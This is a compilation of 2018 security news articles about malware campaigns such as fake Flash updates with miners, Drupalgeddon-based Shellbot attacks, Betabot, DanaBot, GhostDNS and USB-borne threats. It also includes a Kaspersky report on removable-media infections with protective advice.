- Virus -
Last update 09.10.2017 13:47:12
Introduction List Kategorie Subcategory 0 1 2 3 4 5 6
Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update
14.10.2018 securityaffairs Virus
Security experts from Palo Alto Networks warn of fake Adobe Flash update hiding a miner that works as legitimate update and really update the software.
A fake Adobe Flash update actually was used as a vector for a malicious cryptocurrency miner, the novelty in this last campaign is represented by the tricks used by attackers to stealthily drop the malware.
The fake Adobe Flash update has been actively used in a campaign since this summer, it borrows the code from the legitimate update and also updates victims’ software, but it also includes the code to download an XMRig cryptocurrency miner on Windows systems.
“However, a recent type of fake Flash update has implemented additional deception. As early as August 2018, some samples impersonating Flash updates have borrowed pop-up notifications from the official Adobe installer.” reads the analysis published by Palo Alto Networks.
“These fake Flash updates install unwanted programs like an XMRig cryptocurrency miner, but this malware can also update a victim’s Flash Player to the latest version.”
The fake Adobe Flash updates use file names starting with AdobeFlashPlayer that are hosted on cloud-based web servers that don’t belong to Adobe.
The downloads always include the string “flashplayer_down.php?clickid=” in the URL.
At the time of the report, it is still unclear the way attackers were spreading the URLs delivering the fake Adobe Flash update.
The domain is associated with other updaters or installers pushing cryptocurrency miners and other unwanted software
Network traffic analysis revealed the infected Windows hosts connect to [osdsoft[.]com] via HTTP POST request. This domain was associated with updaters or installers pushing cryptocurrency miners.
“This domain is associated with updaters or installers pushing cryptocurrency miners and other unwanted software. One such example from December 2017 named free-mod-menu-download-ps3.exe also shows osdsoft[.]com followed by XMRig traffic on TCP port 14444 like the example used in this blog.” continues the report.
“However, other malware samples reveal osdsoft[.]com is associated with other unwanted programs usually classified as malware.”
PaloAlto Networks experts highlighted that potential victims will still receive warning messages about running downloaded files on their Windows computer.
“This campaign uses legitimate activity to hide distribution of cryptocurrency miners and other unwanted programs,” concludes the analysis.
“Organizations with decent web filtering and educated users have a much lower risk of infection by these fake updates.
Hackers targeting Drupal vulnerabilities to install the Shellbot Backdoor
13.1.0218 securityaffairs Vulnerebility Virus
A group of hackers is targeting Drupal vulnerabilities, including Drupalgeddon2, patched earlier this year to install a backdoor on compromised servers.
Security experts from IBM are targeting Drupal vulnerabilities, including the CVE-2018-7600 and CVE-2018-7602 flaws, aka Drupalgeddon2 and Drupalgeddon3, to install a backdoor on the infected systems and tack full control of the hosted platforms.
According to the IBM experts, this last wave of attacks is conducted by hackers financially motivated and attempt to exploit the lack of patch management in many Drupal websites.
“In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.” states the post published by IBM.
“This appears to be a financially motivated effort to mass-compromise websites.”
The expert observed a large number of HTTP POST requests being sent by the same IP address as part of a widespread cyber-attack. The requests were used by the attackers to download a Perl script to launch the Shellbot backdoor that leverages an Internet Relay Chat (IRC) channel as C&C.
The bot included multiple tools to carry out distributed denial-of-service (DDoS) attacks and scan for SQL injection weaknesses and other vulnerabilities, including privilege escalation issues.
The bot was designed to automate scanning a large number of websites and fully compromise the vulnerable ones.
Experts pointed out that the Shellbot code first appeared in 2005 and is being used by several threat groups, it was also used in the massive crypto-mining campaign that was exploiting the CVE-2017-5638 Apache Struts vulnerability (CVE-2017-5638) in March 2017.
“It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications,” IBM concludes.
Researchers Link New NOKKI Malware to North Korean Actor
4.10.2018 securityweek Virus
A recently observed variant of the KONNI malware appears tied to a remote access Trojan (RAT) previously attributed to a North Korean actor, Palo Alto Networks security researchers say.
Dubbed NOKKI, the new malware family shows close resemblance and code overlaps with KONNI, a piece of malware long used in attacks targeting the Korean peninsula, and is likely the work of the same developer. The threat has been in use since at least January 2018 and shows ties to the threat group known as Reaper, Palo Alto Networks reveals in a recent post.
NOKKI, the security researchers discovered, was designed to collect a broad range of information from the infected machine (includes IP address, hostname, username, drive information, operating system information, and details on the installed programs), can drop additional malware onto the system, and can also execute decoy documents.
Starting in January, the researchers observed several attacks involving NOKKI, targeting entities in Cambodia and Russia with documents featuring content related to local political matters.
In a report published this week, Palo Alto Networks reveals that NOKKI is related to the DOGCALL malware family, a backdoor previously attributed to the Reaper group and likely in use by this group only. The actor is known for targeting the military and defense industry within South Korea, as well as a Middle Eastern organization doing business with North Korea.
By analyzing malicious macros within Microsoft Word documents designed to drop NOKKI, the researchers discovered that the employed deobfuscation technique was also used in documents targeting individuals interested in the World Cup hosted in Russia in 2018 with the DOGCALL malware.
While the NOKKI dropper samples would fetch both a payload and a decoy document, the World Cup malware sample would download and execute a remote VBScript file wrapped in HTML, while also appending text to the original Word document to provide the lure for the victim.
The VBScript file leverages the same unique deobfuscation routine, and fetches and executes a dropper called Final1stspy, which in turn downloads a payload belonging to the DOGCALL malware family.
When installed on a compromised machine, the threat can take screenshots, log keys, capture microphone data, collect victim information, collect files of interest, and download and execute additional payloads.
Communication with the command and control (C&C) is performed via third-party hosting services such as Dropbox, pCloud, Yandex Cloud, and Box.
“What originally began as research surrounding a new malware family named NOKKI that had code overlap and other ties to KONNI lead us to an interesting discovery tying the NOKKI malware family to the Reaper threat actor group. Additionally, we discovered yet another malware family that has not been previously publicly reported that we have named Final1stspy,” Palo Alto Networks concludes.
Betabot - An Example of Cheap Modern Malware Sophistication
4.10.2018 securityweek Virus
What appears to be a new campaign delivering the Betabot malware has been detected by security researchers. It doesn't look as if this campaign is directly related to the wide-ranging campaign disclosed by Kaspersky Lab in August. However, like the Kaspersky campaign, this one also uses phishing as the original point of infection.
"The campaign doesn't seem directly related to the Kaspersky report," Assaf Dahan, senior director, threat hunting at Cybereason's Nocturnus Research told SecurityWeek. "The TTPs are quite different. The campaign discussed in our report seems less targeted, and originates from generic phishing emails."
Cybereason does not know who is behind the new campaign. "Since Betabot's source code and old builders are available online in hacking forums (or new ones sold rather cheaply ~200$), it is hard to estimate who is behind it," added Dahan.
"The Betabot infections seen in our telemetry originated from phishing campaigns that used social engineering to persuade users to download and open what appears to be a Word document that is attached to an email," explains the report.
Betabot, also known as Neurevt, first appeared in late 2012. "The malware began as a banking Trojan," writes Dahan, "and is now packed with features that allow its operators to practically take over a victim's machine and steal sensitive information." Its main features include a form grabber, FTP and mail client stealer, banking, USB infection, Userland rootkit, command execution via shell, additional malware downloads, persistence, and a crypto-currency miner (which was added in late 2017).
It attempts to be persistent and to hide its presence by using all the tricks available, including anti-debugging, anti-virtual machine/sandbox, anti-disassembly and the ability to detect security products and analysis tools. It also seeks to find and eliminate any other malware on the system "with heuristic approaches that would put many security products to shame."
The infection chain starts with social engineering designed to get users to download and open what appears to be an attached Word document. It exploits an 18-year-old vulnerability in the Equation Editor tool in Microsoft Office, that was patched in 2017 (CVE-2017-11882).
If successful, what is a weaponized RTF document executes dqfm.cmd, which spawns hondi.cmd. Hondi does preparatory work and executes the Betabot dropper, mondi.exe. This extracts the Betabot loader and the encrypted main payload, and injects it into its own child process. Betabot then examines all running processes to find additional injection candidates.
"In many of the cases Cybereason observed," writes Dahan, "the Betabot loader injected its code into multiple running processes for persistence and maximized survival purposes. If an injected process is terminated, another process will kick in and spawn the loader as a child process."
While the first candidate is usually a second instance of explorer.exe, Cybereason has seen Betabot injecting itself into a McAfee process called shtat.exe. Once injected, Betabot attempts to connect to its C2 servers.
Cybereason describes Betabot as paranoid, doing everything it can to prevent detection and maintain persistence. It seeks to detect a virtual environment by querying the registry and looking for the names of virtual machine vendors such as VMware, VirtualBox and Parallels, as well as searching for specific drivers' vendor files. It also checks for indications of a sandbox, and attempts to prevent debugging.
Betabot attempts to detect -- and sometimes remove -- 30 different leading anti-malware products. Apart from trying to neutralize threats to its presence, it also seeks to eliminate rival malware (which could attract the attention of security teams).
"Betabot will attempt to detect other bots and malware on the infected host," writes Dahan, "by looking for common malware persistence patterns and other heuristic features. For example, Betabot will enumerate registry autorun keys to look for suspicious-looking persistence indicators that are common in malware."
It even has a routine that looks for script-based fileless malware persistence patterns.
Boston, MA-based Cybereason raised $100 million in Series D funding from SoftBank Corp in June 2017, bringing the total investment in the cyber-attack detection firm to $189 million since it was founded in 2012.
New Danabot Banking Malware campaign now targets banks in the U.S.
3.10.2018 securityaffairs Virus
According to malware researchers from Proofpoint, DanaBot attackers launched a new campaign aimed at banks in the United States.
A couple of weeks ago, security experts at ESET observed a surge in activity of DanaBot banking Trojan that was targeting Poland, Italy, Germany, Austria, and as of September 2018, Ukraine.
DanaBot is a multi-stage modular banking Trojan written in Delphi, the malware allows operators to add new functionalities by adding new plug-ins.
When it was analyzed by Proofpoint, its experts speculated the threat has been under active development.
The banking Trojan initially targeted Australia and Poland users, then it has expanded in other countries, including Italy, Germany, Austria, and as of September 2018, Ukraine.
According to Proofpoint, now DanaBot attackers launched a new campaign aimed at banks in the United States as well. Experts monitored different campaigns using a different ID found in server communications, a circumstance that suggests the DanaBot is being offered through the malware-as-a-service model.
ProofPoint has identified 9 different actors distributing the Trojan to a specific region, experts highlighted that only Australia was targeted by two different groups of attackers.
“Based on distribution methods and targeting, we have been grouping DanaBot activity using an “affiliate ID” that we have observed in various part of the C&C protocol (e.g., offset 0xc of the 183-byte binary protocol header). ” reads the report published by ProofPoint.
The campaign against North America uses spam messages that pretend to be digital faxes from eFax received by the recipients.
When the recipient clicks on the download button included in the content of the message, it will download a weaponized Word document that poses as an eFax.
Is the recipient enables the macros to properly view the fax, the malicious code executes the embedded Hancitor malware that downloads two versions of Pony stealer and the DanaBot banking malware
“The emails used an eFax lure (Figure 1) and contained a URL linking to the download of a document containing malicious macros (Figure 2). The macros, if enabled by the user, executed the embedded Hancitor malware [3], which, in turn, received tasks to download two versions of Pony stealer and the DanaBot banking malware.” continue the analysis.
Experts from Proofpoint highlighted that each affiliate id is utilizing different distribution methods, some actors leverage the Fallout Exploit Kit, others web injects or malspam campaigns. Researchers also found similarities between how DanaBot and the CryptXXX Ransomware that was using a custom command and control protocol on TCP port 443.
Proofpoint speculates DanaBot’s C&C traffic is an evolution of this protocol that uses AES encryption in addition to the Zlib compression.
The researchers believe that the developers created DanaBot as part of an evolution of CryptXXX.
“Thus it would seem that Danabot follows in a long line of malware from one particular group. This family began with ransomware, to which stealer functionality was added in Reveton.” concludes Proofpoint.
“The evolution continued with CryptXXX ransomware and now with a banking Trojan with Stealer and remote access functionality added in Danabot.”
The ‘Gazorp’ Azorult Builder emerged from the Dark Web
2.10.2018 securityaffairs Virus
Checkpoint experts discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to create customized binaries for the Azorult malware.
Security researchers from Checkpoint have discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to easily create customized binaries for the Azorult info-stealing malware.
The Gazorp builder allows generating for free the malicious code to steal passwords, payment information, cryptocurrency wallet data and more.
“On 17th September Check Point Research found a new online builder, dubbed ‘Gazorp’, hosted on the Dark Web. Gazorp is designed for building binaries of the popular malware, Azorult, an infostealer used for stealing user passwords, credit card information, ” states CheckPoint.
“Furthermore, the Gazorp service is provided free of charge and gives threat actors the ability to create fresh Azorult samples and corresponding panel server code, leaving them simply to provide their Command & Control (C&C) address. This address gets embedded into the newly created binary, which in turn can be distributed in any way the threat actor sees fit.”
Check Point researchers took the platform for a test-drive and found that Gazorp does, indeed, perform as advertised, “effectively” creating samples of Azorult version 3.0.
Experts at CheckPoint have tried the Gazorp builder and successfully generated working samples of Azorult version 3.0.
This version of the malware was observed in the wild five months ago, since then, it was updated two times, experts discovered the versions, 3.1 and 3.2 in live attacks.
Azorult has been around since at least 2016, malware researchers at Proofpoint spotted a new version of the AZORult Spyware in the wild, it was involved in a large email campaign on July 18, just 24 hours it appeared in cybercrime forums on the Dark Web.
Experts also noted that Gazorp’s emergence on the Dark Web was the result of the leak of the code for the Azorult’s panel (for versions 3.1 and 3.2).
The availability of the code allows anyone to easily create its own version of the Azorult C&C panel, the experts added that the leak also contained a builder for the latest version of the malware. This builder isn’t the original one used by the authors, “it merely encoded and placed the C&C address string given to it as an argument by the user to a particular field in a ready-made binary.”
“It is possible then that the simple mechanism and the overall delivery of the recent versions to the public inspired Gazorp’s authors to introduce it online.” continues the analysis.
The online builder links to a Telegram channel used by the authors to update users on their activity and to share updates on the project.
Gazorp authors plan to implement future extensibility with a “modules” section, the ability to configure the panel and export the various databases to a file.
Experts believe we can soon assist at a spike of campaigns leveraging the Azorult info-stealer generated with the Gazorp builder.
“For now, it seems we are looking at a very early version of the Gazorp service (0.1), where the main product delivered is an enhanced Azorult C&C panel code. However, we do expect the project to evolve with time, and possibly produce new variants for Azorult.” concludes CheckPoint.
“Given that the service is free, it is also possible that new campaigns with Gazorp built binaries will start to emerge in higher scale in the wild. We will keep monitoring this threat and provide any insights on our research blog when such will come up.”
Fileless Malware Attacks on the Rise, Microsoft Says
2.10.2018 securityweek Virus
Fileless malware attacks, or incidents where the malicious payload doesn’t touch the disk, but is executed directly in memory instead, are on the rise, Microsoft says.
Attacks that leverage fileless techniques are not new, but were recently adopted by a broader range of malware. A couple of years ago, the Kovter Trojan was well known for the use of this infection method, but various threat actors, ransomware, and even crypto-mining malware adopted it since.
Last November, a Barkly report suggested that fileless assaults were ten times more likely to succeed compared to other infection methods.
Now, Microsoft says that the move to fileless techniques was only the next logical step in the evolution of malware, especially with antivirus solutions becoming increasingly efficient at detecting malicious executables.
“Real-time protection gives visibility on each new file that lands on the disk. Furthermore, file activity leaves a trail of evidence that can be retrieved during forensic analysis,” Andrea Lelli of the Windows Defender Research team at Microsoft notes in a blog post.
“Removing the need for files is the next progression of attacker techniques,” Lelli says.
The result of this is an increase in attacks that use malware with fileless techniques, where the executable is never dropped on the disk. The approach not only removes the need of relying on physical files, but also improves stealth and persistence.
For attackers, this also means the discovery of new techniques for executing the code, which some solved by infecting legitimate components and achieving execution in these components’ environment. Referred to as “living off the land”, the technique usually abuses tools that are already available on the platform, such as mshta.exe.
As Lelli points out, however, there is no generally accepted definition of a fileless attack, and even malware families that do rely on files to operate are included. Thus, some parts of the attack might be fileless, while others would still rely on the filesystem.
Overall, Microsoft groups fileless threats into different categories, based on entry point (execution/injection, exploit, hardware), the form of entry point (file, script, etc.), and the host of the infection (Flash, Java, documents), which results in three big types of fileless threats.
The malware can be completely fileless (performing no file activity), writes no files to disk but still uses some files indirectly, or requires the use of files to achieve fileless persistence.
While file-based inspection is ineffective against fileless malware, behavioural analytics and other technologies should be efficient in detecting such attacks.
Microsoft themselves integrated their Windows Defender Advanced Threat Protection (ATP) with capabilities such as behaviour monitoring, memory scanning, and boot sector protection, to detect and terminate threat activity at runtime.
Furthermore, Windows Defender ATP integrates with Antimalware Scan Interface (AMSI), “an open framework that applications can use to request antivirus scans of any data,” to defend against fileless malware and other threats, Microsoft says.
When it comes to fighting fileless attacks that live off the land, behaviour monitoring is particularly useful, Lelli says. In fact, Microsoft has been long touting Windows 10’s ability to detect in-memory attack methods that abuse legitimate processes.
Memory scanning is also useful when it comes to detecting the presence of malicious code in the memory of a running process. Even malware that runs without the use of a physical file (such as the GandCrab ransomware) needs to reside in memory to operate, and memory scanning can detect it there, Lelli points out.
Another defense that’s effective against fileless attacks is boot sector protection. In Windows 10, controlled folder access prevents write operations to the boot sector, thus helping Windows Defender ATP stop attack vectors used by Petya, BadRabbit, and bootkits.
“As antivirus solutions become better and better at pinpointing malicious files, the natural evolution of malware is to shift to attack chains that use as few files as possible. While fileless techniques used to be employed almost exclusively in sophisticated cyberattacks, they are now becoming widespread in common malware, too,” Microsoft concludes.
GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers
2.10.2018 securityaffairs Virus
Security experts from Qihoo 360 NetLab spotted GhostDNS, a malware that already infected over 100K+ devices and targets 70+ different types of routers
Security experts from Qihoo 360 NetLab have uncovered an ongoing hacking campaign that leverages the GhostDNS malware. Attackers have already hijacked over 100,000 home routers, the malicious code allows to modify DNS settings to hijack the traffic and redirect users to phishing websites.
Between September 21 and 27, the GhostDNS campaign compromised more than 100,000 routers, most of them (87.8%) located in Brazil.
GhostDNS reminds us of the infamous DNSChanger malware that made the headlines for its ability to change DNS settings on the infected device
GhostDNS scans for the IP addresses used by routers that use weak or no password then accesses them and changes the DNS settings to a rogue DNS server operated by the attackers.
“Just like the regular dnschanger, this campaign attempts to guess the password on the router’s web authentication page or bypass the authentication through the dnscfg.cgi exploit, then changes the router’s default DNS address to the Rogue DNS Server[3]through the corresponding DNS configuration interface.” reads the analysis published by the experts.
“But this campaign has more, we have found three related DNSChanger programs, which we call Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger according to their programming languages.”
The GhostDNS has a modular structure composed of four components:
1) DNSChanger Module: The main module designed to exploit targeted routers, it has three sub-modules dubbed, Shell DNSChanger, Js DNSChanger, and PyPhp DNSChanger.
1.) Shell DNSChanger is written in the Shell programming language and combines 25 Shell scripts that allow the malware to carry out brute-force attacks on routers or firmware packages from 21 different manufacturers.
2.) Js DNSChanger is written in JavaScript and includes 10 attack scripts designed to infect 6 routers or firmware packages. It includes scanners, payload generators, and attack programs. The Js DNSChanger program is usually injected into phishing websites, so it works together with the Phishing Web System.
3.) PyPhp DNSChanger is written in Python and PHP, it contains 69 attack scripts designed to target 47 different routers/firmware. The component has been found deployed on over 100 servers, most of which on Google Cloud, it includes functionalities like Web API, Scanner and Attack module. Experts believe this sub-module is the core module of DNSChanger that allows attackers to scan the Internet to find vulnerable routers.
2) Web Admin module: Experts believe it implements an admin panel for attackers secured with a login page.
3) Rogue DNS module: The module resolves targeted domain names from the attacker-controlled web servers. At the time of the investigation, the expert had no access to the Rouge DNS server, for this reason, it was not possible to know the exact number DNS entries used to hijack legitimate domains.
4) Phishing Web module: The module implements phishing pages for the domains targeted in this campaign.
Attackers appear to be focused on Brazil where mainly targeted major banks.
“Currently the campaign mainly focuses on Brazil, we have counted 100k+ infected router IP addresses (87.8% located in Brazil), and 70+ router/firmware have been involved, and 50+ domain names such as some big banks in brazil , even Netflix, Citibank.br have been hijacked to steal the corresponding website login credentials,” continues the researchers.
Experts warn of the threat GhostDNS malware poses to Internet sue to its scalability and the availability of multiple attack vector.
Further details, including IoCs are reported in the analysis published by Qihoo 360 NetLab.
Notorious Hackers Serve SpicyOmelette to Unsuspecting Victims
28.9.2018 securityweek Virus
The financially-motivated "Cobalt" hackers have been establishing a foothold onto victim machines using a piece of malware called SpicyOmelette, Secureworks reveals.
Active since at least 2016 and also referred to as GOLD KINGSWOOD, the Cobalt Gang has been credited with a variety of attacks against financial institutions, including recent attacks against Russian and Romanian banks.
One of the tools the group has been heavily using in their attacks is the CobInt malware, but Secureworks says that the JavaScript remote access Trojan (RAT) dubbed SpicyOmelette was also used in several attacks attributed to the group this year.
Using techniques similar to those employed by state-sponsored actors, the Cobalt group is believed to have stolen around $1.2 billion as of March 2018, Secureworks’ security researchers reveal.
SpicyOmelette, they explain, is a tool used mainly during the initial exploitation of a targeted organization. Usually delivered via phishing emails, the malware includes a series of evasion techniques to hinder prevention and detection.
“GOLD KINGSWOOD delivered SpicyOmelette through a phishing email containing a shortened link that appeared to be a PDF document attachment. When clicked, the link used the Google AppEngine to redirect the system to a GOLD KINGSWOOD-controlled Amazon Web Services (AWS) URL that installed a signed JavaScript file, which was SpicyOmelette,” Secureworks explains.
The hackers used a valid digital certificate to sign the malicious script. Although users might have been warned about running external content, the system would have also indicated that the script was signed with a valid certificate.
By passing parameters to a valid Microsoft utility, SpicyOmelette provides threat actors with the ability to execute arbitrary JavaScript code on compromised systems, thus being able to bypass application-whitelisting defenses.
Capable of detecting the presence of 29 different antivirus tools on the infected system, the RAT allows attackers to profile the machine by gathering information such as running software, system name, IP address, and the like, as well as to install additional malware.
The malware and other post-compromise tools regularly used by Cobalt can then be leveraged to escalate privileges through the theft of account credentials, to evaluate the compromised environment and identify desirable systems, and to deploy malware specifically designed to target those systems.
Secureworks expects the Cobalt Gang to continue to evolve its toolset and operations, suggesting that financial organizations of all sizes and in all geographies could be exposed to the group’s attacks. Due to its history of successful campaigns, the actor should be seen as a formidable threat, the researchers say.
USB threats from malware to miners
28.9.2018 Kaspersky Virus
Introduction
In 2016, researchers from the University of Illinois left 297 unlabelled USB flash drives around the university campus to see what would happen. 98% of the dropped drives were picked up by staff and students, and at least half were plugged into a computer in order to view the content. For a hacker trying to infect a computer network, those are pretty irresistible odds.
USB devices have been around for almost 20 years, offering an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors, most famously by the Stuxnet worm in 2010, which used USB devices to inject malware into the network of an Iranian nuclear facility.
Today, cloud services such as Dropbox have taken on much of the heavy lifting in terms of file storage and transfer, and there is greater awareness of the security risks associated with USB devices. Their use as an essential business tool is declining. Despite this, millions of USB devices are still produced and distributed annually, with many destined for use in homes, businesses and marketing promotion campaigns like trade show giveaways.
USB devices remain a target for cyberthreats. Kaspersky Lab data for 2017 shows that every 12 months or so, around one in four users worldwide is affected by a ‘local’ cyber incident. These are attacks detected directly on a user’s computer and include infections caused by removable media like USB devices.
This short report reviews the current cyberthreat landscape for removable media, particularly USBs, and provides advice and recommendations on protecting these little devices and the data they carry.
Methodology and key findings
The overview is based on detections by Kaspersky Lab’s file protection technologies in the drive root of user computers, with a specific scan filter and other measures applied. It covers malware-class attacks only and does not include detections of potentially dangerous or unwanted programs such as adware or risk tools (programs that are not inherently malicious, but are used to hide files or terminate applications, etc. that could be used with malicious intent). The detection data is shared voluntarily by users via Kaspersky Security Network (KSN).
Key findings
USB devices and other removable media are being used to spread cryptocurrency mining software – and have been since at least 2015. Some victims were found to have been carrying the infection for years.
The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
One in 10 of all users hit by removable media infections in 2018 was targeted with this crypto-miner (around 9.22%, up from 6.7% in 2017 and 4.2% in 2016).
Other malware spread through removable media/USBs includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
The 2010 Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
Dark Tequila, a complex banking malware reported on August 21, 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.
The evolving cyberthreat landscape for USBs
Infections caused by removable media are defined as local threats – those that are detected directly on a user’s computer, for example, during a scheduled, installation or user-initiated security scan. Local threats differ from threats targeting computers over the internet (web-borne threats), which are far more prevalent. Local infections can also be caused by an encrypted malicious program hidden in a complex installer. To isolate the data for malware spread by removable media such as USB devices, we took the detections triggered in the drive root of affected computers – a strong indicator that the infection source is removable media.
This data shows that the number of removable media (drive root) threat detections has declined steadily since 2014, but the overall rate of decline may be slowing down. In 2014, the ratio between a user affected by a removable media threat and the total number of such threats detected was 1:42; by 2017 this had dropped by around half to 1:25; with the estimate for 2018 around 1:22.
These numbers pale in comparison to web-borne threats: in 2017, Kaspersky Lab’s file antivirus detected 113.8 million likely removable media threats, while its web antivirus repelled just under 1.2 billion attacks launched from online resources. In light of this, it can be easy to overlook the enduring risks presented by removable media, even though around four million users worldwide will be infected in this way in 2018.
*Total number (in millions) of malware detections triggered in the drive root of user computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN (download)
*Number of unique users (in millions) with malware detections triggered in the drive root of computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN (download)
USBs as a tool for advanced threat actors
USB devices appeal to attackers targeting computer networks that are not connected to the internet – such as those powering critical national infrastructure. The most famous example of this is probably the Stuxnet campaign. In 2009 and 2010, the Stuxnet worm targeted Iran’s nuclear facilities in order to disrupt operations.
USB devices were used to inject malware into the facilities’ air-gapped networks. Among other things, the devices included an exploit to a Windows LNK vulnerability (CVE-2010-2568) that enabled remote code execution. Other advanced threat actors, including Equation Group, Flame, Regin and HackingTeam, have all integrated exploits for this vulnerability into removable media to use in attacks.
Further, the structure of most USB devices allows them to be converted to provide hidden storage compartments, for the removal of stolen data, for example. The ProjectSauron 2016 toolkit was found to include a special module designed to move data from air-gapped networks to internet-connected systems. This involved USB drives that had been formatted to change the size of the partition on the USB disk, reserving some hidden space (several hundred megabytes) at the end of the disk for malicious purposes.
The Stuxnet survivor CVE-2010-2568
Microsoft fixed the last of the vulnerable LNK code path in March 2015. However, in 2016, as many as one in four Kaspersky Lab users who encountered an exploit through any attack medium, including web-borne threats, faced an exploit for this vulnerability, (although it was overtaken in 2017 by the EternalBlue exploit). However, CVE-2010-2568 continues to feature in malware distributed by USB devices and other removable media: where, despite rapidly falling numbers of detections and victims, it still ranks among the top 10 drive root threats detected by KSN.
Total drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN (download)
Users with drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN (download)
If the exploit detections provide an indication of the volume of malware being transmitted via removable media such as USBs, the following illustrate the kind of malware being distributed in this way.
Malware delivered via removable media
The top malware spread via removable media has stayed relatively consistent since at least 2016. For example, the family of Windows LNK malware, Trojans containing links for downloading malicious files or paths for launching a malicious executable, has remained among the top three threats spread by removable media. This malware is used by attackers to destroy, block, modify or copy data, or to disrupt the operation of a device or its network. The WinLNK Runner Trojan, which was the top detected USB threat in 2017, is used in worms for launching executable files.
In 2017, 22.7 million attempted WinLNK.Agent infections were detected, affecting nearly 900,000 users. The estimate for 2018 is around 23 million attacks, hitting just over 700,000 users. This represents a 2% rise in detections and a 20% drop in the number of users targeted year-on-year.
For the WinLNK Runner Trojan the numbers are expected to fall more sharply – with a 61% drop in detections from 2.75 million in 2017 to an estimated 1 million in 2018; and a decline of 51% in the number of users targeted (from around 920,000 in 2017 to just over 450,000 in 2018).
Other top malware spread through USB devices includes the Sality virus, first detected in 2003 but heavily modified since; and the Dinihou worm that automatically copies itself onto a USB drive, creating malicious shortcuts (LNKs) that launch the worm as soon as the new victim opens them.
Miners – rare but persistent
USB devices are also being used to spread cryptocurrency mining software. This is relatively uncommon, but successful enough for attackers to continue using this method of distribution. According to KSN data, a popular crypto-miner detected in drive roots is Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all, known since 2014.
Malware in this family secretly uses the processor capacity of the infected computer to generate the cryptocurrency. The Trojan drops the mining application onto the PC, then installs and silently launches the mining software and downloads the parameters that enable it to send the results to an external server controlled by the attacker.
Kaspersky Lab’s data shows that some of the infections detected in 2018 date back years, indicating a lengthy infection likely to have had a significant negative impact on the processing power of the victim device.
Detection data for the 32-bit version of Trojan.Win32.Miner.ays is as follows:
Year Detection data for Trojan.Win32.Miner.ays Unique user count
2017 778,620 236,000
2018 (estimate based on H1) 600,698 196,866
Between H1 2017 (136,954 unique users) and H1 2018 (93,433 unique users), there was a fall of 28.13 percentage points in the number of people affected by the 32-bit version of the miner.
The other version, Trojan.Win64.Miner.all, saw an expected surge in the first year of detection, after which the number of users hit has levelled out to a steady growth rate of around one-sixth per year. This small but steady growth rate can also been seen when the number of users targeted with this mining malware is compared against the overall number of users hit by removable media threats. This shows that around one in 10 users hit with a removable media threat in 2018 will be targeted with this miner, about a two-fold rise in two years.
These results suggest that propagation via removable media works well for this threat.
Detection data for Trojan.Win64.Miner.all is as follows:
Year Detection data for
Trojan.Win64.Miner.all Unique user count YoY change Unique user count as share of all users hit with a removable media threat
2016 4,211,246 245,702 +70.15% 4.2%
2017 4,214,785 301,178 +18.42% 6.7%
2018 (estimate based on H1) 4,209,958 362,242 +16.42% 9.2%
Dark Tequila – advanced banking malware
In August 2018, Kaspersky Lab researchers reported on a sophisticated cyber operation code-named Dark Tequila that has been targeting users in Mexico for at least the last five years, stealing bank credentials and personal and corporate data with malware that can move laterally through the victim computer while offline.
According to Kaspersky Lab researchers, the malicious code spreads through infected USB devices and spear phishing and includes features to evade detection. The threat actor behind Dark Tequila is believed to be Spanish-speaking and Latin American in origin.
Target geography
Emerging markets appear to be the most vulnerable to infection by removable media.
The annual numbers for 2017 show that in many such countries, around two-thirds of users experienced a ‘local’ incident, which includes drive root malware infections from removable media, compared to less than one in four in developed economies. These figures appear to be remaining consistent into 2018.
For the LNK exploit spread through removable media, the most affected countries in 2018 to date are Vietnam (18.8% of users affected), Algeria (11.2%) and India (10.9%), with infections also found in the rest of Asia, Russia and Brazil, among others, and a few hits in a number of European countries (Spain, Germany, France, the UK and Italy), the U.S. and Japan.
Share of users affected by an exploit for CVE-2010-2568 through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included) (download)
The reach is broader for the miner. Trojan.Win32.Miner.ays/Trojan.Win.64.Miner.all detections are mainly found in India (23.7%), Russia (18.45% – likely to be impacted by a larger customer base) and Kazakhstan (14.38%), with infections also found in other parts of Asia and Africa, and a few hits in several European countries (the UK, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark and Sweden), the U.S., Canada and Japan.
Share of users affected by the bitcoin cryptocurrency miner through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included) (download)
Conclusion and advice
The main purpose of this short paper is to raise awareness of a threat that consumers and businesses may underestimate.
USB drives offer many advantages: they are compact and handy, and a great brand asset, but the devices themselves, the data stored on them and the computers they are plugged into are all potentially vulnerable to cyberthreats if left unprotected.
Fortunately, there are some effective steps consumers and organizations can take to secure the use of USB devices.
Advice for all USB users:
Be careful about the devices you connect to your computer – do you know where it came from?
Invest in encrypted USB devices from trusted brands – this way you know your data is safe even if you lose the device
Make sure all data stored on the USB is also encrypted
Have a security solution in place that checks all removable media for malware before they are connected to the network – even trusted brands can be compromised through their supply chain
Additional advice for businesses:
Manage the use of USB devices: define which USB devices can be used, by whom and for what
Educate employees on safe USB practices – particularly if they are moving the device between a home computer and a work device
